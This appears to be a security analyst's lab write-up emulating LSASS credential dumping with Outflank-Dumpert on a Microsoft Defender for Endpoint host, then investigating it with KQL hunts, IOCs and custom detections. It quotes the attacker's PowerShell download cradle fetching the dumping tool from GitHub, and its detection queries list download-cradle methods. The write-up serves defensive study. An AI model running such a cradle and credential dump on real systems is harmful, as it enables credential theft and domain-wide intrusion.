An end-to-end adversary emulation and blue-team investigation: emulating a credential-theft intrusion against a Microsoft Defender for Endpoint host, then investigating it as a live incident to validate detection coverage.
A credential-dumping tool was downloaded via a PowerShell cradle, executed through the command shell, and used to read the memory of the Windows lsass.exe process, writing a 53 MB credential dump to disk. Microsoft Defender for Endpoint detected the activity, raised multiple high-severity alerts, and automatically isolated the host. Through structured triage and KQL threat hunting, the full attack lifecycle was reconstructed, enriched with threat intelligence, and confirmed as a true positive.
LSASS credential dumping is one of the most common precursors in ransomware and hands-on-keyboard intrusions. A single successful dump can expose every credential cached on a host, enabling pass-the-hash and lateral movement across an entire domain. Validating that an EDR detects this technique, and that an analyst can investigate it end to end, is precisely the capability that shrinks attacker dwell time and stops one compromised host from becoming a domain-wide breach.
A focused single-host lab with full EDR telemetry, mirroring the foundational visibility a SOC analyst works with daily. A clean, well-understood environment makes detection validation defensible: every event can be attributed and explained.
| Component | Detail |
|---|---|
| Host | winserv2025 · Windows Server 2025 Datacenter (Azure) |
| Device ID | 0891dcf7d7bef51643b86555d806a9974d94a24b |
| EDR | Microsoft Defender for Endpoint — onboarded, telemetry confirmed |
| Emulation | Atomic Red Team · C:\AtomicRedTeam\ |
| Investigation | Microsoft Defender XDR portal + Advanced Hunting (KQL) |
| Account in scope | mrdaniel98 (local interactive user) |
Tooling note — Outflank-Dumpert was chosen deliberately. It uses direct system calls and API unhooking to access LSASS while evading the userland hooks many EDRs rely on. Validating detection against an evasion-aware tool is a stronger test than a naïve procdump run.
This section follows the actual order of investigation. It is written to show analyst reasoning, not just findings.
The investigation began from an MDE alert flagged as potential human-operated suspicious activity. Before concluding anything, I reviewed the surrounding device timeline. The activity immediately preceding the alert was a routine browser session, expected baseline for this host. I then examined the process tree at the head of the chain.
This is the legitimate Windows boot chain. wininit.exe → services.exe → mssense.exe (the MDE sensor) is expected, all images are Microsoft-signed at 0/71 on VirusTotal, and timestamps align with system startup. Benign — but I did not close here. A benign boot chain inside a flagged incident is a prompt to ask what else MDE correlated, not a reason to dismiss.
Blast radius: one device (winserv2025, High risk) and one flagged account (mrdaniel98).
The incident timeline held two high-severity alerts and one lower-value correlated artifact.
The msedge.exe renamed Local State event drew attention because the file signer showed as Unknown. I investigated rather than assuming.
The PreviousFileName was an Edge-Local-State-Tmp-*.tmp file in Edge's User Data folder. This is the atomic safe-write pattern Chromium browsers use universally: write to a temp file, then rename to Local State to avoid corruption. It was pulled into the incident by correlation with genuinely malicious activity on the same account — benign correlated noise. Refocused on the two high-severity alerts.
Analyst maturity is recognising correlation noise instead of chasing it indefinitely — and verifying before dismissing. Both happened here. One query to clear it, then move on.
Two high-severity alerts defined the incident: Compromised account credentials (Credential Access) and Compromised account conducting hands-on-keyboard attack (Lateral Movement). The first was explicitly tagged T1003.001 — LSASS Memory and named the responsible process.
Reconstructing the process tree gave the execution chain:
```text
powershell.exe (8768)                 # initial download cradle
└─ cmd.exe (10080)                    # /c "...\ExternalPayloads\Outflank-Dumpert.exe"
   └─ Outflank-Dumpert.exe (2764)     # unsigned · VirusTotal 52/70
      └─ accessed lsass.exe (856)     # Credential Access
```
| Indicator | Value | Significance |
|---|---|---|
| Payload signer | Unknown | Legitimate tooling is signed |
| VirusTotal | 52 / 70 | High-confidence malicious binary |
| Exec path | C:\AtomicRedTeam\ExternalPayloads\ | Non-standard, staged location |
| Target | lsass.exe | Holds NTLM hashes, Kerberos tickets, cached creds |
52/70 on an unsigned binary that accesses LSASS is unambiguous — this alone closes the question of whether the binary is malicious. Remaining work: confirm how it arrived and whether it succeeded.
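The chain above can be rebuilt mechanically from process telemetry. The following is an added example, not code from the write-up: it walks parent/child links over constructed rows shaped like the MDE DeviceProcessEvents and DeviceEvents columns, using the PIDs and image names reported here; the `accessor_chain` fallback and the cycle guard are this example's additions for garbled or incomplete telemetry.

```python
# Added example, not code from the original write-up: rebuild the execution chain
# behind an LSASS access from parent/child telemetry. Rows are constructed samples
# shaped like MDE DeviceProcessEvents / DeviceEvents columns (PIDs from the incident).

# Constructed process-start rows (DeviceProcessEvents shape). Parent PIDs of
# powershell.exe and lsass.exe are 0 because the sample omits those rows.
PROCESS_EVENTS = [
    {"ProcessId": 8768, "InitiatingProcessId": 0, "FileName": "powershell.exe"},
    {"ProcessId": 10080, "InitiatingProcessId": 8768, "FileName": "cmd.exe"},
    {"ProcessId": 2764, "InitiatingProcessId": 10080, "FileName": "Outflank-Dumpert.exe"},
    {"ProcessId": 856, "InitiatingProcessId": 0, "FileName": "lsass.exe"},
]

# Constructed access row (DeviceEvents shape): FileName/ProcessId are the target,
# the InitiatingProcess* columns describe the process that opened it.
LSASS_ACCESS = {"ActionType": "LsassProcessAccess", "FileName": "lsass.exe",
                "ProcessId": 856, "InitiatingProcessId": 2764,
                "InitiatingProcessFileName": "Outflank-Dumpert.exe"}


def ancestry(pid: int, events: list) -> list:
    """Follow InitiatingProcessId links from `pid` to the root, root-first. Keyed on
    ProcessId alone for brevity; real telemetry should also match creation time (PID reuse)."""
    by_pid = {e["ProcessId"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:  # `seen` stops cyclic/garbled links
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["InitiatingProcessId"]
    chain.reverse()
    return chain


def accessor_chain(access: dict, events: list) -> list:
    """Ancestry of the LSASS accessor; falls back to the access row's own columns."""
    rows = ancestry(access["InitiatingProcessId"], events)
    return rows or [{"FileName": access["InitiatingProcessFileName"],
                     "ProcessId": access["InitiatingProcessId"]}]


def execution_chain(access: dict, events: list) -> list:
    """Image names from the initial cradle down to the accessed target."""
    return [r["FileName"] for r in accessor_chain(access, events)] + [access["FileName"]]


def render_tree(access: dict, events: list) -> str:
    """Render the chain in the indented tree form used in the write-up."""
    rows = accessor_chain(access, events)
    lines = [f'{rows[0]["FileName"]} ({rows[0]["ProcessId"]})']
    for depth, row in enumerate(rows[1:], start=1):
        lines.append("   " * (depth - 1) + f'└─ {row["FileName"]} ({row["ProcessId"]})')
    lines.append("   " * (len(rows) - 1) + f'└─ accessed {access["FileName"]} ({access["ProcessId"]})')
    return "\n".join(lines)
```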
Pivoting to Advanced Hunting, the initiating PowerShell command line told the full story — a textbook stage-and-execute download cradle.
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path "...\ExternalPayloads\Outflank-Dumpert.exe") -Force
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/.../Outflank-Dumpert.exe" `
    -OutFile "...\ExternalPayloads\Outflank-Dumpert.exe"
```
Forces TLS 1.2 to guarantee the download, creates a staging directory, pulls the payload from a public code-hosting URL, and saves it for execution.
The most important question in any credential-access incident: did the attacker actually obtain credentials? I hunted for the dump artifact.
```kql
DeviceFileEvents
| where DeviceName == "winserv2025"
| where FileName == "dumpert.dmp"
| project Timestamp, FileName, FolderPath, ActionType, FileSize,
          InitiatingProcessFileName, SHA256
```
The dump succeeded. A 53 MB artifact is consistent with a full LSASS memory image, not a failed or empty write. The attacker now possesses a credential dump that can be parsed offline (e.g. with Mimikatz) to extract every hash and ticket cached on the host. This is the moment an incident escalates from "suspicious" to "contain now."
Querying process activity in the session window revealed what the operator did around the dump.
| Activity | Process | ATT&CK | Assessment |
|---|---|---|---|
| Identity enum | whoami.exe | T1033 | Operator orienting on account privileges |
| Host enum | hostname.exe | T1082 | Confirming the landed machine |
| Scheduled task | schtasks /create | T1053.005 | Persistence pattern in session window |
| On-host compile | csc.exe /noconfig | T1027 | C# compiler invocation — hunt lead |
The whoami / hostname enumeration is the clearest attacker-relevant post-exploitation behavior — running identity and host discovery around a credential dump is characteristic of a human operator making real-time decisions, consistent with MDE's "hands-on-keyboard" classification. In this emulation, the scheduled-task and csc.exe events partly trace to the Atomic Red Team harness; in a production incident each would warrant its own dedicated hunt, so they are documented here as leads rather than confirmed adversary persistence.
Final question: did the 53 MB dump leave the machine? I scoped outbound connections to the attack-relevant processes only.
```kql
DeviceNetworkEvents
| where DeviceName == "winserv2025"
| where Timestamp >= datetime(2026-06-07T15:45:14Z)
| where InitiatingProcessFileName in~ ("powershell.exe","cmd.exe","Outflank-Dumpert.exe")
| project Timestamp, RemoteIP, RemotePort, RemoteUrl, InitiatingProcessFileName
```
| Destination | Port | Assessment |
|---|---|---|
| github.com | 443 | Payload download source (already documented) |
| cdn.oneget.org | 443 | Microsoft PowerShell package CDN — benign |
| *.powershellgallery.com | 443 | Microsoft PowerShell Gallery — benign |
I enriched the most interesting outbound domain with threat intelligence.
VirusTotal returned 0/91 for cdn.oneget.org, and the surrounding context (Microsoft-owned package infrastructure, traffic during module install, a top-10K domain) confirms it is benign. Critically, no outbound connection came from Outflank-Dumpert.exe itself, and no exfiltration of the dump was observed. The credential dump remained local at the time of detection.
A clean VirusTotal result does not prove a domain is safe — it only means no engine has flagged it. The benign conclusion here rests on corroborating context (ownership, timing, purpose), not on the score alone.
| Tactic | Technique | ID | Observed Behavior |
|---|---|---|---|
| Execution | Command & Scripting Interpreter: PowerShell | T1059.001 | Download cradle staging the payload |
| Execution | Command & Scripting Interpreter: Windows Command Shell | T1059.003 | cmd.exe /c launching the binary |
| Credential Access | OS Credential Dumping: LSASS Memory | T1003.001 | Reading lsass.exe → dumpert.dmp |
| Discovery | System Owner/User Discovery | T1033 | whoami enumeration |
| Discovery | System Information Discovery | T1082 | hostname enumeration |
| Persistence | Scheduled Task/Job | T1053.005 | schtasks /create in session (hunt lead) |
Malicious binary — Outflank-Dumpert.exe

| Field | Value |
|---|---|
| SHA1 | c494bbb35b2b53b3a05aef627710e27c7c800a1f |
| SHA256 | f323569e5d64a3aa60045bd06c2421e729d1c0d79028aba9e227d9eeaeec62e5 |
| MD5 | 69c05093eb542e1c29a556a29e74e99a |
| Path | C:\AtomicRedTeam\ExternalPayloads\Outflank-Dumpert.exe |
| VT | 52 / 70 |
Credential dump artifact — dumpert.dmp

| Field | Value |
|---|---|
| SHA256 | 7dbdac5eb14bc2718ef9bfdf8486f4d97ee09cceb10d936c33df227ff2cf2798 |
| Path | C:\Windows\Temp\dumpert.dmp |
| Size | 55,577,992 bytes |
Network & host (defanged)

| Field | Value |
|---|---|
| Download URL | hxxps://github[.]com/clr2of8/Dumpert/raw/.../Outflank-Dumpert.exe |
| Host | winserv2025 |
| Account | mrdaniel98 |
Note: the specific raw URL is the indicator; github.com itself is a legitimate, widely abused host and should not be blocked wholesale.
Reusable detection logic for this attack class. Each query is paired with false-positive tuning, because a detection that fires constantly is as useless as one that never fires.
Analytic 6.1 (LSASS access):

```kql
DeviceEvents
| where ActionType == "LsassProcessAccess"
| where InitiatingProcessFileName !in~ (
    "MsMpEng.exe","mssense.exe","svchost.exe","csrss.exe",
    "wininit.exe","lsass.exe","services.exe")
| project Timestamp, DeviceName, InitiatingProcessFileName,
          InitiatingProcessFolderPath, InitiatingProcessCommandLine
```
Catches: any process outside a known-good allowlist reading LSASS — the defining behavior of T1003.001. Tuning: build the allowlist from your own environment baseline; legitimate security and backup agents touch LSASS.
Analytic 6.2 (download cradle):

```kql
DeviceProcessEvents
// the PowerShell process itself: its own ProcessCommandLine carries the cradle
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has_any ("Invoke-WebRequest","IWR","Net.WebClient","DownloadFile")
| where ProcessCommandLine has_any (".exe","-OutFile")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine
```
Catches: the staging step where PowerShell pulls a remote binary to disk. Tuning: pair with reputation (unsigned/new file) to separate from legitimate installers.
Analytic 6.3 (dump artifact):

```kql
DeviceFileEvents
| where ActionType == "FileCreated" and FileName endswith ".dmp"
| where FolderPath has_any ("\\Temp\\","\\AppData\\","\\ProgramData\\")
| where InitiatingProcessFileName !in~ ("WerFault.exe","dwwin.exe")
| project Timestamp, DeviceName, FileName, FolderPath, FileSize, InitiatingProcessFileName
```
Catches: on-disk evidence of a successful dump — a backstop when the access event is missed. Tuning: Windows Error Reporting is excluded; large dumps from unexpected parents are the signal.
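The two analytics the validation table marks as validated (6.1 and 6.3) can be unit-tested offline before they go into production. The following is an added example, not the write-up's own code: plain functions run over constructed rows shaped like the MDE tables the queries read, with the incident's true positives beside benign lookalikes. The 50 MB size floor is this example's assumption, set from the 53 MB artifact recovered here; derive your own from baseline crash-dump sizes.

```python
# Added example, not from the original write-up: custom analytics 6.1 and 6.3 as
# plain functions over constructed telemetry rows shaped like the MDE tables they
# query, so the allowlist and size tuning can be checked offline. The 50 MB floor is
# this example's assumption (the investigation's dump was 53 MB), not the page's.
LSASS_ALLOWLIST = {"msmpeng.exe", "mssense.exe", "svchost.exe", "csrss.exe",
                   "wininit.exe", "lsass.exe", "services.exe"}  # baseline from the write-up
STAGING_DIRS = ("\\temp\\", "\\appdata\\", "\\programdata\\")
WER_PARENTS = {"werfault.exe", "dwwin.exe"}     # Windows Error Reporting dump writers
MIN_DUMP_BYTES = 50 * 1024 * 1024               # assumed: a full LSASS image is large


def lsass_access_hits(device_events: list) -> list:
    """Analytic 6.1: LSASS opened by a process outside the known-good baseline.
    Matching is case-insensitive, like KQL's !in~."""
    return [e for e in device_events
            if e["ActionType"] == "LsassProcessAccess"
            and e["InitiatingProcessFileName"].lower() not in LSASS_ALLOWLIST]


def dump_artifact_hits(file_events: list, min_bytes: int = MIN_DUMP_BYTES) -> list:
    """Analytic 6.3: a .dmp created in a staging directory by a non-WER parent,
    plus the size floor the tuning note asks for (large dumps are the signal)."""
    return [e for e in file_events
            if e["ActionType"] == "FileCreated"
            and e["FileName"].lower().endswith(".dmp")
            and any(d in e["FolderPath"].lower() for d in STAGING_DIRS)
            and e["InitiatingProcessFileName"].lower() not in WER_PARENTS
            and e["FileSize"] >= min_bytes]


# Constructed sample rows: the incident's true positives beside benign lookalikes.
DEVICE_EVENTS = [
    {"ActionType": "LsassProcessAccess", "InitiatingProcessFileName": "Outflank-Dumpert.exe"},
    {"ActionType": "LsassProcessAccess", "InitiatingProcessFileName": "MsMpEng.exe"},
    {"ActionType": "ProcessCreated", "InitiatingProcessFileName": "Outflank-Dumpert.exe"},
]
FILE_EVENTS = [
    {"ActionType": "FileCreated", "FileName": "dumpert.dmp", "FileSize": 55_577_992,
     "FolderPath": "C:\\Windows\\Temp\\dumpert.dmp", "InitiatingProcessFileName": "Outflank-Dumpert.exe"},
    {"ActionType": "FileCreated", "FileName": "app.dmp", "FileSize": 2_000_000,
     "FolderPath": "C:\\Users\\x\\AppData\\Local\\CrashDumps\\app.dmp", "InitiatingProcessFileName": "WerFault.exe"},
    {"ActionType": "FileCreated", "FileName": "svc.dmp", "FileSize": 1_500_000,
     "FolderPath": "C:\\ProgramData\\svc\\svc.dmp", "InitiatingProcessFileName": "svc.exe"},
]
```

Passing `min_bytes=0` reproduces the page's KQL without the size floor and also surfaces the small svc.dmp row, which is the volume the threshold is meant to suppress.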
| Detection layer | Fired? |
|---|---|
| MDE built-in — T1003.001 LSASS Memory alert | Yes |
| MDE built-in — Compromised account / hands-on-keyboard | Yes |
| MDE Attack Disruption — automatic host isolation | Yes |
| Custom analytic 6.1 (LSASS access) | Validated |
| Custom analytic 6.3 (dump artifact) | Validated |
Containment, eradication, and recovery guidance a SOC would attach to this incident.
- Isolate winserv2025 (MDE did this automatically — confirm it held).
- Treat mrdaniel98 and every credential cached on the host as compromised.
- Preserve dumpert.dmp for forensic analysis before removal.
- Consider a krbtgt reset if domain-joined and broader compromise is suspected.

The Local State rename was worth one query to clear; chasing it further would have wasted time on the real lead.